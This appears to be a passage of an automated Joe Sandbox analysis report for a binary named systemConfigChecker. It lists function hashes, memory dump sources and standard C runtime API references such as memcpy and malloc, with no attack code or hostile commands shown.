          • Opcode Fuzzy Hash: f0efb582e9fd0d0aec3b92626ce79b77502db8850f48cde8c95ecbadf30f19f3
          • Instruction Fuzzy Hash: F4819932B14A8189EB11CF68D4803AD37B0FB49B68F541632DB5D93B98DF79D499C304
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
          • String ID:
          • API String ID: 1775671525-0
          • Opcode ID: c2ecc101523887dfbce848d0c382d276e7dab405c5916f86757184a1f49b3e57
          • Instruction ID: e39d9f4573353596a56ff995ea13600b92073445e570803f9b27449a3651bc7f
          • Opcode Fuzzy Hash: c2ecc101523887dfbce848d0c382d276e7dab405c5916f86757184a1f49b3e57
          • Instruction Fuzzy Hash: 2B51E763A04B8181EB11DF29D1042AE23A1FB16BCCF104636DF2C97395CFBAE699D344
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
          • String ID:
          • API String ID: 1155477157-0
          • Opcode ID: 3b1734b16001e6aae9ffa7fa666c80b4a0036caafceed5919fb728048b8fe9a5
          • Instruction ID: 7853c8449a8e8954718d5053e28529747af058e80a40e77cef562f433c9d4600
          • Opcode Fuzzy Hash: 3b1734b16001e6aae9ffa7fa666c80b4a0036caafceed5919fb728048b8fe9a5
          • Instruction Fuzzy Hash: 9851D222E04B4191EB11AF29D4042AE33A0FB56B98F644B36DF6C933C5DFB9E198C344
          APIs
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FF6B2708E38), ref: 00007FF6B2708580
            • Part of subcall function 00007FF6B270B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6B270107B), ref: 00007FF6B270B522
            • Part of subcall function 00007FF6B2701310: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF6B270131B
          • memcpy.VCRUNTIME140(?,?,?,00007FF6B2708E38), ref: 00007FF6B27085A1
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B27085BC
            • Part of subcall function 00007FF6B2701270: __std_exception_copy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B270B543), ref: 00007FF6B27012B4
          • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6B2708E38), ref: 00007FF6B2708625
          • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6B2708E38), ref: 00007FF6B270862E
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_taskXlength_error@std@@__std_exception_copy_invalid_parameter_noinfo_noreturnmallocmemcpy
          • String ID:
          • API String ID: 2733788171-0
          • Opcode ID: cc599559b1e2dc559bef56f8741a9cfb5031f2f9e9da837cb50f94ad93c65c76
          • Instruction ID: a9ad5b29094bc888eb412543f0860ce36705abcf76fd29f03675756cc9c0b0d5
          • Opcode Fuzzy Hash: cc599559b1e2dc559bef56f8741a9cfb5031f2f9e9da837cb50f94ad93c65c76
          • Instruction Fuzzy Hash: 4A41C332B05B5281EB559B29E4403BE3391EB45BACF148632DB2C837D6DEB9D4DA8704
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: __current_exception__current_exception_contextterminate
          • String ID: csm
          • API String ID: 2542180945-1018135373
          • Opcode ID: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
          • Instruction ID: 9473f1e1b167d7cba1ef3f5972aa375f613c0297a7c6d17e783910e0fb1ea108
          • Opcode Fuzzy Hash: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
          • Instruction Fuzzy Hash: B1F04937615B40CAC3119F25E8840AC33A4F74DB8CB4A6235FB4D87755CF39D8948305
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: Concurrency::cancel_current_task
          • String ID:
          • API String ID: 118556049-0
          • Opcode ID: 1ef9cebed11aa757f790f007fe67e90c90a9a1ada4030d4e0cebe6aba601f67a
          • Instruction ID: e5500b86edf763e88fce1e012a830ece2891c1cfbac3ed17785e514b0e23aebc
          • Opcode Fuzzy Hash: 1ef9cebed11aa757f790f007fe67e90c90a9a1ada4030d4e0cebe6aba601f67a
          • Instruction Fuzzy Hash: 3121C610B2429A59ED192A7F49054A707516F26FF8F384B30FF3C47BD2DDA9E4468708
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: fed82e02baa9a700fae8dd61e3f5e5d4e6d578d09e70afdffe5bad35c6b6e123
          • Instruction ID: 40facb2893308862fe7a3320687d24d2759ebedfabda147977cf59df65c5a642
          • Opcode Fuzzy Hash: fed82e02baa9a700fae8dd61e3f5e5d4e6d578d09e70afdffe5bad35c6b6e123
          • Instruction Fuzzy Hash: 77518332608A8185DB558F6CE45036EB7E0FB85B98F544236EB9D87798DF7DC448C704
          APIs
          • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF6B2705133), ref: 00007FF6B2709F3A
            • Part of subcall function 00007FF6B270B508: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6B270107B), ref: 00007FF6B270B522
          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF6B2705133), ref: 00007FF6B2709F65
          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF6B2705133), ref: 00007FF6B2709F75
          • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6B2709FA9
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
          • String ID:
          • API String ID: 1155477157-0
          • Opcode ID: aaed713836a9e07829c7c5aa24cae673d9406276abb4a7650c50821929c431c8
          • Instruction ID: 5ad1a3b996a53505a83780a376434e743b49c1c29191ad0429bd23839b729498
          • Opcode Fuzzy Hash: aaed713836a9e07829c7c5aa24cae673d9406276abb4a7650c50821929c431c8
          • Instruction Fuzzy Hash: 3641CF22B18A5181EA11DB16A40026A6394EB4AFF8F544731EF7D877C4EEBDE489C304
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
          • String ID:
          • API String ID: 1155477157-0
          • Opcode ID: 02b2daf3b4cdd67512b4dcb332c80498ab88a7d2536f8d74dc2c416b8924f1bd
          • Instruction ID: ee4e4ebad461a951a4dca3d50bbae1c31815514dfc4b70f0bd5c77d1c4a22723
          • Opcode Fuzzy Hash: 02b2daf3b4cdd67512b4dcb332c80498ab88a7d2536f8d74dc2c416b8924f1bd
          • Instruction Fuzzy Hash: 5E31E622A09B4181E9159B19950027E63D1EB46BB8F240B34DF7D877D0DFBDE4868348
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.1576590528.00007FF6B2701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B2700000, based on PE: true
          • Associated: 00000000.00000002.1576574673.00007FF6B2700000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576612753.00007FF6B270E000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576635338.00007FF6B2715000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.1576665489.00007FF6B2716000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_7ff6b2700000_systemConfigChecker.jbxd
          Similarity
          • API ID: memcpy$Concurrency::cancel_current_task
          • String ID:
          • API String ID: 326894585-0
          • Opcode ID: 1b4f2082b6732203ba004f792acabdaaba1c17f9c324c4eb6b640517a242389a
          • Instruction ID: 3e857386a0e3dcf12c3af1f008a08cf5422c9b55130c88bfb5831f806a1189a6
          • Opcode Fuzzy Hash: 1b4f2082b6732203ba004f792acabdaaba1c17f9c324c4eb6b640517a242389a
          • Instruction Fuzzy Hash: FE21D822B0974249EB169B19A5403FE23E09F067F8F140730DF6D877C6DEBD99968304